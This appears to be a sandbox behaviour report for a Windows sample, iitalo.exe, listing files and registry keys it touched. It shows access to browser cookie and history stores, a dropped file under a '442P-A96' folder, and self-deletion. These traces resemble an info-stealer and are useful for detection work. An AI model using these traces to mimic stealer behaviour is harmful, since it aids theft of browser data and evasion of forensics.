C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\iitalo.exe.config C:\Users\Seven01\AppData\Local\Temp\iitalo.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\* C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll \Device\KsecDD C:\Windows\assembly\NativeImages_v4.0.30319_32\cjN\* C:\Users\Seven01\AppData\Local\Temp\iitalo.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol26.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll C:\Windows\Microsoft.Net\assembly\GAC_32\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Formatters.Soap.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Users\Seven01\AppData\Local\Temp\iitalo.exe.Local\ C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Users\Seven01\AppData\Local\GDIPFONTCACHEV1.DAT C:\Windows\Fonts\ahronbd.ttf C:\Windows\Fonts\tahoma.ttf C:\Windows\Fonts\msjh.ttf C:\Windows\Fonts\msyh.ttf C:\Windows\Fonts\malgun.ttf C:\Windows\Fonts\micross.ttf C:\Windows\Fonts\segoeui.ttf C:\Users\Seven01\AppData\Local\Temp\it-IT\cjN.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\cjN.resources\cjN.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\cjN.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\cjN.resources\cjN.resources.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Users\Seven01\AppData\Local\Temp\it\cjN.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\cjN.resources\cjN.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\cjN.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\cjN.resources\cjN.resources.exe C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\psapi.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\WindowsFormsApp1.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\WindowsFormsApp1.resources\WindowsFormsApp1.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\WindowsFormsApp1.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\WindowsFormsApp1.resources\WindowsFormsApp1.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\WindowsFormsApp1.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\WindowsFormsApp1.resources\WindowsFormsApp1.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\WindowsFormsApp1.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\WindowsFormsApp1.resources\WindowsFormsApp1.resources.exe C:\Windows\Microsoft.Net\assembly\GAC_32\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\c1ad6bd64a23a5d912f171480ee2f9a2\System.Management.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\c1ad6bd64a23a5d912f171480ee2f9a2\System.Management.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll C:\Windows\assembly\GAC_64 C:\Windows\assembly\GAC_64\mscorlib.resources C:\Windows\assembly\GAC_32 C:\Windows\assembly\GAC_32\mscorlib.resources C:\Windows\assembly\GAC_MSIL C:\Windows\assembly\GAC_MSIL\mscorlib.resources C:\Windows\assembly\GAC_MSIL\mscorlib.resources\* C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC C:\Windows\assembly\GAC\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_64 C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_32 C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_MSIL C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\bcrypt.dll C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll C:\Users\Seven01\AppData\Local\Temp\iitalo.exe:Zone.Identifier C:\Windows\SysWOW64\ntdll.dll C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies C:\Users\Seven01\AppData\Local\Microsoft\Windows\History C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\ C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\ C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Windows\SysWOW64\ipconfig.exe.Local\ C:\Users\Seven01\AppData\Roaming\442P-A96\442logim.jpeg C:\ C:\Windows\Temp C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029 C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4 C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6 C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2 C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b C:\Windows\sysnative\LogFiles\Scm\fca58fb2-231f-4daa-bca0-77602b638485 C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\iitalo.exe.config C:\Users\Seven01\AppData\Local\Temp\iitalo.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol26.dat C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Users\Seven01\AppData\Local\GDIPFONTCACHEV1.DAT C:\Windows\Fonts\tahoma.ttf C:\Windows\Fonts\msjh.ttf C:\Windows\Fonts\msyh.ttf C:\Windows\Fonts\malgun.ttf C:\Windows\Fonts\micross.ttf C:\Windows\Fonts\segoeui.ttf C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\c1ad6bd64a23a5d912f171480ee2f9a2\System.Management.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\c1ad6bd64a23a5d912f171480ee2f9a2\System.Management.ni.dll C:\Windows\SysWOW64\ntdll.dll C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029 C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4 C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6 C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2 C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b C:\Windows\sysnative\LogFiles\Scm\fca58fb2-231f-4daa-bca0-77602b638485 C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428
Write Files
C:\Users\Seven01\AppData\Local\GDIPFONTCACHEV1.DAT C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Users\Seven01\AppData\Roaming\442P-A96\442logim.jpeg
Delete Files
C:\Users\Seven01\AppData\Local\Temp\iitalo.exe:Zone.Identifier C:\Users\Seven01\AppData\Local\Temp\iitalo.exe
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iitalo.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index26 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts HKEY_CURRENT_USER\Software\Microsoft\GDIPlus HKEY_CURRENT_USER\Software\Microsoft\GDIPlus\FontCachePath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink HKEY_CURRENT_USER\EUDC\1252 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|iitalo.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|iitalo.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|iitalo.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a 